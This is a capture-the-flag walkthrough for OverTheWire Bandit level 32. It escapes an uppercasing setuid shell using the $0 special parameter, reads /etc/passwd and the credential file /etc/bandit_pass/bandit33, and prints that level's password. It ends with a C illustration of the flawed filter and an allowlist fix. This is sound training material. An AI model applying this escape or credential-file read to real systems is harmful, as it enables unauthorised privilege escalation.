Level32

Level Goal

After all this git stuff it's time for another escape. Good luck!

Solution

The goal states that this will be an escape, so to find out which shell is set for bandit32 we can look in the /etc/passwd file. The entry for bandit32 names /home/bandit32/uppershell as the login shell, and listing that file shows that it’s a setuid executable owned by bandit33.

root@0xCAB: /writeups/overthewire/bandit/level32/

$ grep bandit32 /etc/passwd
bandit32:x:11032:11032:bandit level 32:/home/bandit32:/home/bandit32/uppershell

$ ll /home/bandit32/uppershell
-rwsr-x--- 1 bandit33 bandit32 15128 Jan 11 19:18 uppershell*

$

Logging in as bandit32 drops us into this shell. It seems like everything we type gets uppercased and then passed to sh. Looking at the sh man page, we see that there are special parameters built in to sh. These special parameters don’t involve letters, so uppershell can’t capitalize them. If we use the “$$” parameter we can see the PID of the shell, so we know these parameters are being passed to sh. The man page tells us that the “$0” parameter expands to the name of the shell or shell script. Using that causes the name of the shell to be executed by sh, and we get a new shell as bandit33. We can now get the password for bandit33.

root@0xCAB: /writeups/overthewire/bandit/level32/
WELCOME TO THE UPPERCASE SHELL

$>> ls -la
sh: 1: LS: not found

$>> $$
sh: 1: 3799803: not found

$>> $0

$ whoami
bandit33

$ cat /etc/bandit_pass/bandit33
odHo63fHiFqcWWJG9rLiLDtPm45KzUKy

$
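
The filtering flaw described above, as an added example that is not part of the original writeup and is not the source of uppershell: a C model that assumes the filter simply uppercases each byte, showing that input without lowercase letters passes through unchanged, beside an exact-match allowlist that never hands user input to sh. The function names and the allowlisted commands HELP, STATUS and QUIT are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of the filter: uppercase every byte, as the transcript suggests. */
static void upper_filter(const char *in, char *out, size_t n) {
    size_t i = 0;
    for (; in[i] != '\0' && i + 1 < n; i++)
        out[i] = (char)toupper((unsigned char)in[i]);
    out[i] = '\0';
}

/* True when the filter left the input unchanged, i.e. it constrained nothing. */
static int survives_filter(const char *in) {
    char buf[256];
    upper_filter(in, buf, sizeof buf);
    return strcmp(in, buf) == 0;
}

/* Hardened alternative: exact-match allowlist (hypothetical commands).
 * The caller dispatches on the match itself; no input is passed to sh -c. */
static int is_allowed(const char *in) {
    static const char *const allowed[] = { "HELP", "STATUS", "QUIT" };
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(in, allowed[i]) == 0)
            return 1;
    return 0;
}

int main(void) {
    /* Constructed sample inputs, taken from the session shown on this page. */
    const char *samples[] = { "ls -la", "$$", "$0", "STATUS" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char up[256];
        upper_filter(samples[i], up, sizeof up);
        printf("%-8s -> %-8s unchanged=%d allowlisted=%d\n",
               samples[i], up, survives_filter(samples[i]), is_allowed(up));
    }
    return 0;
}
```

A case transform is a denylist on letters only; the allowlist rejects everything the designer did not explicitly intend, including the special parameters.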